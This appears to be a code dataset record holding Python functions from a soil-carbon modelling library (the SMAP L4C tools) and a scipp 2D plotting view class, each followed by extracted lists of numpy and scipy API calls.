smrz : numpy.ndarray
(T x N) vector of root-zone soil moisture wetness (%), where T is the
number of time steps, N the number of sites
ft : numpy.ndarray
(T x N) vector of the (binary) freeze-thaw status, where T is the
number of time steps, N the number of sites (Frozen = 0, Thawed = 1)
Returns
-------
numpy.ndarray
'''
# Calculate E_mult based on current parameters
f_tmin = linear_constraint(params['tmin0'], params['tmin1'])
f_vpd = linear_constraint(params['vpd0'], params['vpd1'], 'reversed')
f_smrz = linear_constraint(params['smrz0'], params['smrz1'])
f_ft = linear_constraint(params['ft0'], 1.0, 'binary')
return f_tmin(tmin) * f_vpd(vpd) * f_smrz(smrz) * f_ft(ft)
def k_mult(params, tsoil, smsf):
'''
Calculate environmental constraint multiplier for soil heterotrophic
respiration (RH), K_mult, based on current model parameters. The expected
parameter names are "tsoil" for the Arrhenius function of soil temperature
and "smsf0" and "smsf1" for the lower and upper bounds of the ramp
function on surface soil moisture.
Parameters
----------
params : dict
A dict-like data structure with named model parameters
tsoil : numpy.ndarray
(T x N) vector of soil temperature (deg K), where T is the number of
time steps, N the number of sites
smsf : numpy.ndarray
(T x N) vector of surface soil wetness (%), where T is the number of
time steps, N the number of sites
Returns
-------
numpy.ndarray
'''
f_tsoil = partial(arrhenius, beta0 = params['tsoil'])
f_smsf = linear_constraint(params['smsf0'], params['smsf1'])
return f_tsoil(tsoil) * f_smsf(smsf)
def litterfall_casa(lai, years, dt = 1/365):
'''
Calculates daily litterfall fraction after the CASA model (Randerson et
al. 1996). Computes the fraction of evergreen versus deciduous canopy and
allocates a constant daily fraction (out of the year) for evergreen canopy
but a varying daily fraction for deciduous, where the fraction varies with
"leaf loss," a function of leaf area index (LAI). Canopies are assumed to
be a mix of evergreen and deciduous, so the litterfall fraction is a sum
of these two approaches.
<NAME>., <NAME>, <NAME>., <NAME>., &
<NAME>. (1996). Substrate limitations for heterotrophs: Implications
for models that estimate the seasonal cycle of atmospheric CO2.
*Global Biogeochemical Cycles,* 10(4), 585–602.
The approach here is a bit different from Randerson et al. (1996) because
we re- calculate the evergreen fraction each year; however, this is a
reasonable elaboration that, incidentally, accounts for potential changes
in the evergreen-vs-deciduous mix of the canopy. The result is an array
of daily litterfall fractions, i.e., the result multiplied by the annual
NPP sum (for a given site and year) obtains the daily litterfall.
Parameters
----------
lai : numpy.ndarray
The (T x N) leaf-area index (LAI) array, for T time steps and N sites
years : numpy.ndarray
A length-T 1D array indexing the years, e.g., [2001, 2001, 2001, ...];
used to identify which of T time steps belong to a year, so that
litterfall fractions sum to one over a year
dt : float
The fraction of a year that each time step represents, e.g., for daily
time steps, should be close to 1/365 (Default: 1/365)
Returns
-------
numpy.ndarray
The fraction of available inputs (e.g., annual NPP) that should be
allocated to litterfall at each time step
'''
def leaf_loss(lai):
# Leaf loss function from CASA, a triangular averaging function
# centered on the current date, where the right limb of the
# triangle is subtracted from the left limb (leading minus
# lagged LAI is equated to leaf loss)
ll = generic_filter(
lai, lambda x: (0.5 * x[0] + x[1]) - (x[3] + 0.5 * x[4]),
size = 5, mode = 'mirror')
return np.where(ll < 0, 0, ll) # Leaf loss cannot be < 0
# Get leaf loss at each site (column-wise)
ll = np.apply_along_axis(leaf_loss, 0, lai)
ll = np.where(np.isnan(ll), 0, ll) # Fill NaNs with zero leaf loss
unique_years = np.unique(years).tolist()
unique_years.sort()
for each_year in unique_years:
# For those dates in this year...
idx = years == each_year
# Calculate the evergreen fraction (ratio of min LAI to mean LAI over
# the course of a year)
efrac = np.apply_along_axis(
lambda x: np.nanmin(x) / np.nanmean(x), 0, lai[idx,:])
# Calculate sum of 1/AnnualNPP (Evergreen input) plus daily leaf loss
# fraction (Deciduous input); Evergreen canopies have constant daily
# inputs
ll[idx,:] = (efrac * dt) + (1 - efrac) * np.divide(
ll[idx,:], ll[idx,:].sum(axis = 0))
return ll
def mean_residence_time(
hdf, units = 'years', subset_id = None, nodata = -9999):
'''
Calculates the mean residence time (MRT) of soil organic carbon (SOC)
pools as the quotient of SOC stock size and heterotrophic respiration
(RH). Chen et al. (2013, Global and Planetary Change), provide a formal
equation for mean residence time: (SOC/R_H).
Parameters
----------
hdf : h5py.File
The HDF5 file / h5py.File object
units : str
Either "years" (default) or "days"
subset_id : str
(Optional) Can provide keyword designating the desired subset area
nodata : float
(Optional) The NoData or Fill value (Default: -9999)
Returns
-------
tuple
Tuple of: subset array, xoff, yoff, i.e., (numpy.ndarray, Int, Int)
'''
assert units in ('days', 'years'), 'The units argument must be one of: "days" or "years"'
soc_field = HDF_PATHS['SPL4CMDL']['4']['SOC']
rh_field = HDF_PATHS['SPL4CMDL']['4']['RH']
if subset_id is not None:
# Get X- and Y-offsets while we're at it
soc, xoff, yoff = subset(
hdf, soc_path, None, None, subset_id = subset_id)
rh, _, _ = subset(
hdf, rh_path, None, None, subset_id = subset_id)
else:
xoff = yoff = 0
soc = hdf[soc_path][:]
rh = hdf[rh_path][:]
# Find those areas of NoData in either array
mask = np.logical_or(soc == nodata, rh == nodata)
mrt = np.divide(soc, rh)
if units == 'years':
# NOTE: No need to guard against NaNs/ NoData here because of mask
mrt = np.divide(mrt, 365.0)
np.place(mrt, mask, nodata) # Put NoData values back in
return (mrt, xoff, yoff)
def npp(
hdf, use_subgrid = False, subset_id = None, subset_bbox = None,
nodata = -9999):
'''
Calculates net primary productivity (NPP), based on the carbon use
efficiency (CUE) of each plant functional type (PFT). NPP is derived
as: `NPP = GPP * CUE`, where `CUE = NPP/GPP`.
Parameters
----------
hdf : h5py.File
The HDF5 file / h5py.File object
use_subgrid : bool
True to use the 1-km subgrid; requires iterating through the PFT means
subset_id : str
(Optional) Can provide keyword designating the desired subset area
subset_bbox : list or tuple
(Optional) Can provide a bounding box to define a desired subset area
nodata : float
The NoData value to mask (Default: -9999)
Returns
-------
numpy.ndarray
NPP values on an EASE-Grid 2.0 array
'''
grid = 'M01' if use_subgrid else 'M09'
cue_array = cue(get_pft_array(grid, subset_id, subset_bbox))
if not use_subgrid:
if subset_id is not None or subset_bbox is not None:
gpp, _, _ = subset(
hdf, 'GPP/gpp_mean', subset_id = subset_id,
subset_bbox = subset_bbox)
else:
gpp = hdf['GPP/gpp_mean'][:]
else:
raise NotImplementedError('No support for the 1-km subgrid')
gpp[gpp == nodata] = np.nan
return np.multiply(gpp, cue_array)
def ordinals365(dates):
'''
Returns a length-T sequence of ordinals on [1,365]. Can be used for
indexing a 365-day climatology; see `climatology365()`.
Parameters
----------
dates : list or tuple
Sequence of datetime.datetime or datetime.date instances
Returns
-------
list
'''
return [
t - 1 if (year % 4 == 0 and t >= 60) else t
for t, year in [(int(t.strftime('%j')), t.year) for t in dates]
]
def rescale_smrz(smrz0, smrz_min, smrz_max = 100):
'''
Rescales root-zone soil-moisture (SMRZ); original SMRZ is in percent
saturation units. NOTE: Although Jones et al. (2017) write "SMRZ_wp is
the plant wilting point moisture level determined by ancillary soil
texture data provided by L4SM..." in actuality it is just `smrz_min`.
Parameters
----------
smrz0 : numpy.ndarray
(T x N) array of original SMRZ data, in percent (%) saturation units
for N sites and T time steps
smrz_min : numpy.ndarray or float
Site-level long-term minimum SMRZ (percent saturation)
smrz_max : numpy.ndarray or float
Site-level long-term maximum SMRZ (percent saturation); can optionally
provide a fixed upper-limit on SMRZ; useful for calculating SMRZ100.
Returns
-------
numpy.ndarray
'''
if smrz_min.ndim == 1:
smrz_min = smrz_min[np.newaxis,:]
assert smrz0.ndim == 2,\
'Expected smrz0 to be a 2D array'
assert smrz0.shape[1] == smrz_min.shape[1],\
'smrz_min should have one value per site'
# Clip input SMRZ to the lower, upper bounds
smrz0 = np.where(smrz0 < smrz_min, smrz_min, smrz0)
smrz0 = np.where(smrz0 > smrz_max, smrz_max, smrz0)
smrz_norm = np.add(np.multiply(100, np.divide(
np.subtract(smrz0, smrz_min),
np.subtract(smrz_max, smrz_min))), 1)
# Log-transform normalized data and rescale to range between
# 5.0 and 100 ()% saturation)
return np.add(
np.multiply(95, np.divide(np.log(smrz_norm), np.log(101))), 5)
def soc_analytical_spinup(litterfall, k_mult, fmet, fstr, decay_rates):
r'''
Using the solution to the differential equations governing change in the
soil organic carbon (SOC) pools, calculates the steady-state size of each
SOC pool.
The analytical steady-state value for the metabolic ("fast") pool is:
$$
C_{met} = \frac{f_{met} \sum NPP}{R_{opt} \sum K_{mult}}
$$
The analytical steady-state value for the structural ("medium") pool is:
$$
C_{str} = \frac{(1 - f_{met})\sum NPP}{R_{opt}\, k_{str} \sum K_{mult}}
$$
The analytical steady-state value for the recalcitrant ("slow") pool is:
$$
C_{rec} = \frac{f_{str}\, k_{str}\, C_{str}}{k_{rec}}
$$
Parameters
----------
litterfall : numpy.ndarray
Average daily litterfall
k_mult : numpy.ndarray
The K_mult climatology, i.e., a (365 x N x 81) array of the long-term
average K_mult value at each of N sites (with 81 1-km subgrid sites)
fmet : numpy.ndarray
The f_metabolic model parameter, as an (N x 81) array
fstr : numpy.ndarray
The f_structural model parameter, as an (N x 81) array
decay_rates : numpy.ndarray
The optimal decay rates for each SOC pool, as a (3 x N x 81) array
Returns
-------
tuple
A 3-element tuple, each element the steady-state values for that pool,
i.e., `(metabolic, structural, recalcitrant)`
'''
# NOTE: litterfall is average daily litterfall (see upstream where we
# divided by 365), so, to obtain annual sum, multiply by 365
c0 = np.divide(
fmet * (litterfall * 365),
decay_rates[0,...] * np.sum(k_mult, axis = 0))
c1 = np.divide(
(1 - fmet) * (litterfall * 365),
decay_rates[1,...] * np.sum(k_mult, axis = 0))
c2 = np.divide(
fstr * decay_rates[1,...] * c1,
decay_rates[2,...])
c0[np.isnan(c0)] = 0
c1[np.isnan(c1)] = 0
c2[np.isnan(c2)] = 0
return (c0, c1, c2)
def tridiag_solver(tri, r, kl = 1, ku = 1, banded = None):
'''
Solution to the tridiagonal equation by solving the system of equations
in sparse form. Creates a banded matrix consisting of the diagonals,
starting with the lowest diagonal and moving up, e.g., for matrix:
A = [[10., 2., 0., 0.],
[ 3., 10., 4., 0.],
[ 0., 1., 7., 5.],
[ 0., 0., 3., 4.]]
banded = [[ 3., 1., 3., 0.],
[10., 10., 7., 4.],
[ 0., 2., 4., 5.]]
The banded matrix is what should be provided to the optoinal "banded"
argument, which should be used if the banded matrix can be created faster
than `scipy.sparse.dia_matrix()`.
Parameters
----------
tri : numpy.ndarray
A tridiagonal matrix (N x N)
r : numpy.ndarray
Vector of solutions to the system, Ax = r, where A is the tridiagonal
matrix
kl : int
Lower bandwidth (number of lower diagonals) (Default: 1)
ku : int
Upper bandwidth (number of upper diagonals) (Default: 1)
banded : numpy.ndarray
(Optional) Provide the banded matrix with diagonals along the rows;
this can be faster than scipy.sparse.dia_matrix()
Returns
-------
numpy.ndarray
'''
assert tri.ndim == 2 and (tri.shape[0] == tri.shape[1]),\
'Only supports 2-dimensional square matrices'
if banded is None:
banded = dia_matrix(tri).data
# If it is necessary, in a future implementation, to extract diagonals;
# this is a starting point for problems where kl = ku = 1
# n = tri.shape[0]
# a, b, c = [ # (n-1, n, n-1) refer to the lengths of each vector
# sparse[(i+1),(max(0,i)):j]
# for i, j in zip(range(-1, 2), (n-1, n, n+1))
# ]
return solve_banded((kl, ku), np.flipud(banded), r)
def vpd(qv2m, ps, temp_k):
r'''
Calculates vapor pressure deficit (VPD); unfortunately, the provenance
of this formula cannot be properly attributed. It is taken from the
SMAP L4C Science code base, so it is exactly how L4C calculates VPD.
$$
\mathrm{VPD} = 610.7 \times \mathrm{exp}\left(
\frac{17.38 \times T_C}{239 + T_C}
\right) - \frac{(P \times [\mathrm{QV2M}]}{0.622 + (0.378 \times [\mathrm{QV2M}])}
$$
Where P is the surface pressure (Pa), QV2M is the water vapor mixing
ratio at 2-meter height, and T is the temperature in degrees C (though
this function requires units of Kelvin when called).
NOTE: A variation on this formula can be found in the text:
<NAME>. and <NAME>. 1990.
Principles of Environmental Physics, 2nd. Ed. Edward Arnold Publisher.
See also:
https://glossary.ametsoc.org/wiki/Mixing_ratio
Parameters
----------
qv2m : numpy.ndarray or float
QV2M, the water vapor mixing ratio at 2-m height
ps : numpy.ndarray or float
The surface pressure, in Pascals
temp_k : numpy.ndarray or float
The temperature at 2-m height in degrees Kelvin
Returns
-------
numpy.ndarray or float
VPD in Pascals
'''
temp_c = temp_k - 273.15 # Convert temperature to degrees C
avp = np.divide(np.multiply(qv2m, ps), 0.622 + (0.378 * qv2m))
x = np.divide(17.38 * temp_c, (239 + temp_c))
esat = 610.7 * np.exp(x)
return np.subtract(esat, avp)
|
[
"numpy.sum",
"numpy.ones",
"numpy.isnan",
"numpy.exp",
"numpy.unique",
"numpy.nanmean",
"numpy.multiply",
"pyl4c.stats.linear_constraint",
"numpy.power",
"numpy.isfinite",
"numpy.place",
"numpy.apply_along_axis",
"pyl4c.utils.get_pft_array",
"scipy.sparse.dia_matrix",
"numpy.var",
"numpy.stack",
"functools.partial",
"numpy.divide",
"numpy.flipud",
"numpy.sort",
"scipy.ndimage.generic_filter",
"pyl4c.utils.subset",
"numpy.subtract",
"numpy.logical_and",
"numpy.log",
"numpy.zeros",
"numpy.nanmin",
"numpy.where",
"numpy.logical_or"
] |
[((4740, 4761), 'numpy.sort', 'np.sort', (['series[:, 0]'], {}), '(series[:, 0])\n', (4747, 4761), True, 'import numpy as np\n'), ((4769, 4790), 'numpy.sort', 'np.sort', (['series[:, 1]'], {}), '(series[:, 1])\n', (4776, 4790), True, 'import numpy as np\n'), ((9339, 9367), 'numpy.zeros', 'np.zeros', (['arr_24hr.shape[1:]'], {}), '(arr_24hr.shape[1:])\n', (9347, 9367), True, 'import numpy as np\n'), ((9552, 9605), 'numpy.apply_along_axis', 'np.apply_along_axis', (['(lambda x: x[1] > x[0])', '(0)', 'updown'], {}), '(lambda x: x[1] > x[0], 0, updown)\n', (9571, 9605), True, 'import numpy as np\n'), ((9651, 9709), 'numpy.logical_and', 'np.logical_and', (['(updown[0, ...] == -1)', '(updown[1, ...] == -1)'], {}), '(updown[0, ...] == -1, updown[1, ...] == -1)\n', (9665, 9709), True, 'import numpy as np\n'), ((11422, 11460), 'numpy.stack', 'np.stack', (['(arr_daytime, arr_nighttime)'], {}), '((arr_daytime, arr_nighttime))\n', (11430, 11460), True, 'import numpy as np\n'), ((12901, 12952), 'pyl4c.stats.linear_constraint', 'linear_constraint', (["params['tmin0']", "params['tmin1']"], {}), "(params['tmin0'], params['tmin1'])\n", (12918, 12952), False, 'from pyl4c.stats import ols, ols_variance, linear_constraint\n'), ((12966, 13027), 'pyl4c.stats.linear_constraint', 'linear_constraint', (["params['vpd0']", "params['vpd1']", '"""reversed"""'], {}), "(params['vpd0'], params['vpd1'], 'reversed')\n", (12983, 13027), False, 'from pyl4c.stats import ols, ols_variance, linear_constraint\n'), ((13041, 13092), 'pyl4c.stats.linear_constraint', 'linear_constraint', (["params['smrz0']", "params['smrz1']"], {}), "(params['smrz0'], params['smrz1'])\n", (13058, 13092), False, 'from pyl4c.stats import ols, ols_variance, linear_constraint\n'), ((13106, 13153), 'pyl4c.stats.linear_constraint', 'linear_constraint', (["params['ft0']", '(1.0)', '"""binary"""'], {}), "(params['ft0'], 1.0, 'binary')\n", (13123, 13153), False, 'from pyl4c.stats import ols, ols_variance, linear_constraint\n'), ((14066, 14107), 'functools.partial', 'partial', (['arrhenius'], {'beta0': "params['tsoil']"}), "(arrhenius, beta0=params['tsoil'])\n", (14073, 14107), False, 'from functools import partial\n'), ((14124, 14175), 'pyl4c.stats.linear_constraint', 'linear_constraint', (["params['smsf0']", "params['smsf1']"], {}), "(params['smsf0'], params['smsf1'])\n", (14141, 14175), False, 'from pyl4c.stats import ols, ols_variance, linear_constraint\n'), ((16701, 16739), 'numpy.apply_along_axis', 'np.apply_along_axis', (['leaf_loss', '(0)', 'lai'], {}), '(leaf_loss, 0, lai)\n', (16720, 16739), True, 'import numpy as np\n'), ((18932, 18974), 'numpy.logical_or', 'np.logical_or', (['(soc == nodata)', '(rh == nodata)'], {}), '(soc == nodata, rh == nodata)\n', (18945, 18974), True, 'import numpy as np\n'), ((18985, 19003), 'numpy.divide', 'np.divide', (['soc', 'rh'], {}), '(soc, rh)\n', (18994, 19003), True, 'import numpy as np\n'), ((19144, 19171), 'numpy.place', 'np.place', (['mrt', 'mask', 'nodata'], {}), '(mrt, mask, nodata)\n', (19152, 19171), True, 'import numpy as np\n'), ((20608, 20635), 'numpy.multiply', 'np.multiply', (['gpp', 'cue_array'], {}), '(gpp, cue_array)\n', (20619, 20635), True, 'import numpy as np\n'), ((22281, 22324), 'numpy.where', 'np.where', (['(smrz0 < smrz_min)', 'smrz_min', 'smrz0'], {}), '(smrz0 < smrz_min, smrz_min, smrz0)\n', (22289, 22324), True, 'import numpy as np\n'), ((22337, 22380), 'numpy.where', 'np.where', (['(smrz0 > smrz_max)', 'smrz_max', 'smrz0'], {}), '(smrz0 > smrz_max, smrz_max, smrz0)\n', (22345, 22380), True, 'import numpy as np\n'), ((24538, 24601), 'numpy.divide', 'np.divide', (['(fstr * decay_rates[1, ...] * c1)', 'decay_rates[2, ...]'], {}), '(fstr * decay_rates[1, ...] * c1, decay_rates[2, ...])\n', (24547, 24601), True, 'import numpy as np\n'), ((27992, 28031), 'numpy.divide', 'np.divide', (['(17.38 * temp_c)', '(239 + temp_c)'], {}), '(17.38 * temp_c, 239 + temp_c)\n', (28001, 28031), True, 'import numpy as np\n'), ((28068, 28090), 'numpy.subtract', 'np.subtract', (['esat', 'avp'], {}), '(esat, avp)\n', (28079, 28090), True, 'import numpy as np\n'), ((1266, 1291), 'numpy.subtract', 'np.subtract', (['tsoil', 'beta2'], {}), '(tsoil, beta2)\n', (1277, 1291), True, 'import numpy as np\n'), ((1488, 1511), 'numpy.where', 'np.where', (['(y0 < 0)', '(0)', 'y0'], {}), '(y0 < 0, 0, y0)\n', (1496, 1511), True, 'import numpy as np\n'), ((10509, 10543), 'numpy.logical_or', 'np.logical_or', (['never_up', 'sun_is_up'], {}), '(never_up, sun_is_up)\n', (10522, 10543), True, 'import numpy as np\n'), ((11132, 11168), 'numpy.divide', 'np.divide', (['arr_daytime', 'daylight_hrs'], {}), '(arr_daytime, daylight_hrs)\n', (11141, 11168), True, 'import numpy as np\n'), ((11193, 11236), 'numpy.divide', 'np.divide', (['arr_nighttime', '(24 - daylight_hrs)'], {}), '(arr_nighttime, 24 - daylight_hrs)\n', (11202, 11236), True, 'import numpy as np\n'), ((16454, 16552), 'scipy.ndimage.generic_filter', 'generic_filter', (['lai', '(lambda x: 0.5 * x[0] + x[1] - (x[3] + 0.5 * x[4]))'], {'size': '(5)', 'mode': '"""mirror"""'}), "(lai, lambda x: 0.5 * x[0] + x[1] - (x[3] + 0.5 * x[4]), size\n =5, mode='mirror')\n", (16468, 16552), False, 'from scipy.ndimage import generic_filter\n'), ((16594, 16617), 'numpy.where', 'np.where', (['(ll < 0)', '(0)', 'll'], {}), '(ll < 0, 0, ll)\n', (16602, 16617), True, 'import numpy as np\n'), ((16758, 16770), 'numpy.isnan', 'np.isnan', (['ll'], {}), '(ll)\n', (16766, 16770), True, 'import numpy as np\n'), ((18619, 18673), 'pyl4c.utils.subset', 'subset', (['hdf', 'soc_path', 'None', 'None'], {'subset_id': 'subset_id'}), '(hdf, soc_path, None, None, subset_id=subset_id)\n', (18625, 18673), False, 'from pyl4c.utils import get_pft_array, subset\n'), ((18708, 18761), 'pyl4c.utils.subset', 'subset', (['hdf', 'rh_path', 'None', 'None'], {'subset_id': 'subset_id'}), '(hdf, rh_path, None, None, subset_id=subset_id)\n', (18714, 18761), False, 'from pyl4c.utils import get_pft_array, subset\n'), ((19118, 19139), 'numpy.divide', 'np.divide', (['mrt', '(365.0)'], {}), '(mrt, 365.0)\n', (19127, 19139), True, 'import numpy as np\n'), ((20166, 20209), 'pyl4c.utils.get_pft_array', 'get_pft_array', (['grid', 'subset_id', 'subset_bbox'], {}), '(grid, subset_id, subset_bbox)\n', (20179, 20209), False, 'from pyl4c.utils import get_pft_array, subset\n'), ((24624, 24636), 'numpy.isnan', 'np.isnan', (['c0'], {}), '(c0)\n', (24632, 24636), True, 'import numpy as np\n'), ((24649, 24661), 'numpy.isnan', 'np.isnan', (['c1'], {}), '(c1)\n', (24657, 24661), True, 'import numpy as np\n'), ((24674, 24686), 'numpy.isnan', 'np.isnan', (['c2'], {}), '(c2)\n', (24682, 24686), True, 'import numpy as np\n'), ((26576, 26593), 'numpy.flipud', 'np.flipud', (['banded'], {}), '(banded)\n', (26585, 26593), True, 'import numpy as np\n'), ((27940, 27961), 'numpy.multiply', 'np.multiply', (['qv2m', 'ps'], {}), '(qv2m, ps)\n', (27951, 27961), True, 'import numpy as np\n'), ((28050, 28059), 'numpy.exp', 'np.exp', (['x'], {}), '(x)\n', (28056, 28059), True, 'import numpy as np\n'), ((1387, 1404), 'numpy.subtract', 'np.subtract', (['a', 'b'], {}), '(a, b)\n', (1398, 1404), True, 'import numpy as np\n'), ((4279, 4307), 'numpy.power', 'np.power', (['x[:, 0]', '(npoly + 1)'], {}), '(x[:, 0], npoly + 1)\n', (4287, 4307), True, 'import numpy as np\n'), ((4445, 4456), 'numpy.isnan', 'np.isnan', (['y'], {}), '(y)\n', (4453, 4456), True, 'import numpy as np\n'), ((4927, 4936), 'numpy.var', 'np.var', (['y'], {}), '(y)\n', (4933, 4936), True, 'import numpy as np\n'), ((4945, 4954), 'numpy.var', 'np.var', (['x'], {}), '(x)\n', (4951, 4954), True, 'import numpy as np\n'), ((5087, 5096), 'numpy.var', 'np.var', (['y'], {}), '(y)\n', (5093, 5096), True, 'import numpy as np\n'), ((5106, 5115), 'numpy.var', 'np.var', (['x'], {}), '(x)\n', (5112, 5115), True, 'import numpy as np\n'), ((10559, 10595), 'numpy.where', 'np.where', (['mask', 'arr_24hr[hr, ...]', '(0)'], {}), '(mask, arr_24hr[hr, ...], 0)\n', (10567, 10595), True, 'import numpy as np\n'), ((10656, 10693), 'numpy.where', 'np.where', (['(~mask)', 'arr_24hr[hr, ...]', '(0)'], {}), '(~mask, arr_24hr[hr, ...], 0)\n', (10664, 10693), True, 'import numpy as np\n'), ((10976, 10996), 'numpy.where', 'np.where', (['mask', '(1)', '(0)'], {}), '(mask, 1, 0)\n', (10984, 10996), True, 'import numpy as np\n'), ((16830, 16846), 'numpy.unique', 'np.unique', (['years'], {}), '(years)\n', (16839, 16846), True, 'import numpy as np\n'), ((20320, 20393), 'pyl4c.utils.subset', 'subset', (['hdf', '"""GPP/gpp_mean"""'], {'subset_id': 'subset_id', 'subset_bbox': 'subset_bbox'}), "(hdf, 'GPP/gpp_mean', subset_id=subset_id, subset_bbox=subset_bbox)\n", (20326, 20393), False, 'from pyl4c.utils import get_pft_array, subset\n'), ((24387, 24409), 'numpy.sum', 'np.sum', (['k_mult'], {'axis': '(0)'}), '(k_mult, axis=0)\n', (24393, 24409), True, 'import numpy as np\n'), ((24503, 24525), 'numpy.sum', 'np.sum', (['k_mult'], {'axis': '(0)'}), '(k_mult, axis=0)\n', (24509, 24525), True, 'import numpy as np\n'), ((26188, 26203), 'scipy.sparse.dia_matrix', 'dia_matrix', (['tri'], {}), '(tri)\n', (26198, 26203), False, 'from scipy.sparse import dia_matrix\n'), ((4466, 4487), 'numpy.ones', 'np.ones', (['(npoly + 1,)'], {}), '((npoly + 1,))\n', (4473, 4487), True, 'import numpy as np\n'), ((7369, 7411), 'numpy.nanmean', 'np.nanmean', (['x[ordinal == day, ...]'], {'axis': '(0)'}), '(x[ordinal == day, ...], axis=0)\n', (7379, 7411), True, 'import numpy as np\n'), ((10145, 10203), 'numpy.logical_and', 'np.logical_and', (['(updown[0, ...] <= hr)', '(hr <= updown[1, ...])'], {}), '(updown[0, ...] <= hr, hr <= updown[1, ...])\n', (10159, 10203), True, 'import numpy as np\n'), ((10287, 10344), 'numpy.logical_or', 'np.logical_or', (['(updown[0, ...] <= hr)', '(hr <= updown[1, ...])'], {}), '(updown[0, ...] <= hr, hr <= updown[1, ...])\n', (10300, 10344), True, 'import numpy as np\n'), ((11379, 11405), 'numpy.isfinite', 'np.isfinite', (['arr_nighttime'], {}), '(arr_nighttime)\n', (11390, 11405), True, 'import numpy as np\n'), ((22440, 22468), 'numpy.subtract', 'np.subtract', (['smrz0', 'smrz_min'], {}), '(smrz0, smrz_min)\n', (22451, 22468), True, 'import numpy as np\n'), ((22478, 22509), 'numpy.subtract', 'np.subtract', (['smrz_max', 'smrz_min'], {}), '(smrz_max, smrz_min)\n', (22489, 22509), True, 'import numpy as np\n'), ((22670, 22687), 'numpy.log', 'np.log', (['smrz_norm'], {}), '(smrz_norm)\n', (22676, 22687), True, 'import numpy as np\n'), ((22689, 22700), 'numpy.log', 'np.log', (['(101)'], {}), '(101)\n', (22695, 22700), True, 'import numpy as np\n'), ((4631, 4652), 'numpy.ones', 'np.ones', (['(npoly + 1,)'], {}), '((npoly + 1,))\n', (4638, 4652), True, 'import numpy as np\n'), ((17161, 17173), 'numpy.nanmin', 'np.nanmin', (['x'], {}), '(x)\n', (17170, 17173), True, 'import numpy as np\n'), ((17176, 17189), 'numpy.nanmean', 'np.nanmean', (['x'], {}), '(x)\n', (17186, 17189), True, 'import numpy as np\n')]
|
# SPDX-License-Identifier: BSD-3-Clause
# Copyright (c) 2022 Scipp contributors (https://github.com/scipp)
# @author <NAME>
from .view import PlotView
from ..core import zeros, scalar
import numpy as np
from matplotlib.collections import PathCollection
class PlotView2d(PlotView):
"""
View object for 2 dimensional plots. Contains a `PlotFigure2d`.
The difference between `PlotView2d` and `PlotFigure2d` is that
`PlotView2d` also handles the communications with the `PlotController` that
are to do with the `PlotProfile` plot displayed below the `PlotFigure2d`.
In addition, `PlotView2d` provides a dynamic image resampling for large
input data.
"""
def __init__(self, figure, formatters):
super().__init__(figure=figure, formatters=formatters)
self._axes = ['y', 'x']
self._marker_index = []
self._marks_scatter = None
self._lim_updated = False
self.current_lims = {}
self.global_lims = {}
for event in ['xlim_changed', 'ylim_changed']:
self.figure.ax.callbacks.connect(event, self._lims_changed)
def _make_data(self, new_values, mask_info):
dims = new_values.dims
for dim in dims:
xmin = new_values.coords[dim].values[0]
xmax = new_values.coords[dim].values[-1]
if dim not in self.global_lims:
self.global_lims[dim] = [xmin, xmax]
self.current_lims[dim] = [xmin, xmax]
values = new_values.values
slice_values = {
"values":
values,
"extent":
np.array([self.current_lims[dims[1]],
self.current_lims[dims[0]]]).flatten()
}
mask_info = next(iter(mask_info.values()))
if len(mask_info) > 0:
# Use automatic broadcasting in Scipp variables
msk = zeros(sizes=new_values.sizes, dtype='int32', unit=None)
for m, val in mask_info.items():
if val:
msk += new_values.masks[m].astype(msk.dtype)
slice_values["masks"] = msk.values
return slice_values
def _lims_changed(self, *args):
"""
Update limits and resample the image according to new viewport.
When we use the zoom tool, the event listener on the displayed axes
limits detects two separate events: one for the x axis and another for
the y axis. We use a small locking mechanism here to trigger only a
single resampling update by waiting for the y limits to also change.
"""
for dim in self.dims:
if dim not in self.global_lims:
return
if not self._lim_updated:
self._lim_updated = True
return
self._lim_updated = False
# Make sure we don't overrun the original array bounds
dimx = self.dims[1]
dimy = self.dims[0]
xylims = {
dimx: np.clip(self.figure.ax.get_xlim(), *sorted(self.global_lims[dimx])),
dimy: np.clip(self.figure.ax.get_ylim(), *sorted(self.global_lims[dimy]))
}
dx = np.abs(self.current_lims[dimx][1] - self.current_lims[dimx][0])
dy = np.abs(self.current_lims[dimy][1] - self.current_lims[dimy][0])
diffx = np.abs(self.current_lims[dimx] - xylims[dimx]) / dx
diffy = np.abs(self.current_lims[dimy] - xylims[dimy]) / dy
diff = diffx.sum() + diffy.sum()
# Only resample image if the changes in axes limits are large enough to
# avoid too many updates while panning.
if diff > 0.1:
self.current_lims.update(xylims)
self.controller.update_data(slices=self.current_limits)
# If we are zooming, rescale to data?
# TODO This will trigger a second call to view.refresh and thus
# self.update_data. Why does the controller have to call refresh
# to make view.rescale_to_data take effect?
if self.figure.rescale_on_zoom():
self.controller.rescale_to_data()
@property
def current_limits(self):
limits = {}
for dim in self.dims:
low, high = self.current_lims[dim]
unit = self._data.coords[dim].unit
limits[dim] = [scalar(low, unit=unit), scalar(high, unit=unit)]
return limits
@property
def global_limits(self):
limits = {}
for dim in self.dims:
low, high = self.global_lims[dim]
unit = self._data.coords[dim].unit
limits[dim] = [scalar(low, unit=unit), scalar(high, unit=unit)]
return limits
def _update_axes(self):
"""
Update the current and global axes limits, before updating the figure
axes.
"""
super()._update_axes()
self.clear_marks()
def clear_marks(self):
"""
Reset all scatter markers when a profile is reset.
"""
if self._marks_scatter is not None:
self._marks_scatter = None
self.figure.ax.collections = []
self.figure.draw()
def _do_handle_pick(self, event):
"""
Return the index of the picked scatter point, None if something else
is picked.
"""
if isinstance(event.artist, PathCollection):
return self._marker_index[event.ind[0]]
def _do_mark(self, index, color, x, y):
"""
Add a marker (colored scatter point).
"""
if self._marks_scatter is None:
self._marks_scatter = self.figure.ax.scatter([x], [y],
c=[color],
edgecolors="w",
picker=5,
zorder=10)
else:
new_offsets = np.concatenate((self._marks_scatter.get_offsets(), [[x, y]]),
axis=0)
new_colors = np.concatenate((self._marks_scatter.get_facecolors(), [color]),
axis=0)
self._marks_scatter.set_offsets(new_offsets)
self._marks_scatter.set_facecolors(new_colors)
self._marker_index.append(index)
self.figure.draw()
def remove_mark(self, index):
"""
Remove a marker (scatter point).
"""
i = self._marker_index.index(index)
xy = np.delete(self._marks_scatter.get_offsets(), i, axis=0)
c = np.delete(self._marks_scatter.get_facecolors(), i, axis=0)
self._marks_scatter.set_offsets(xy)
self._marks_scatter.set_facecolors(c)
self._marker_index.remove(index)
self.figure.draw()
|
[
"numpy.array",
"numpy.abs"
] |
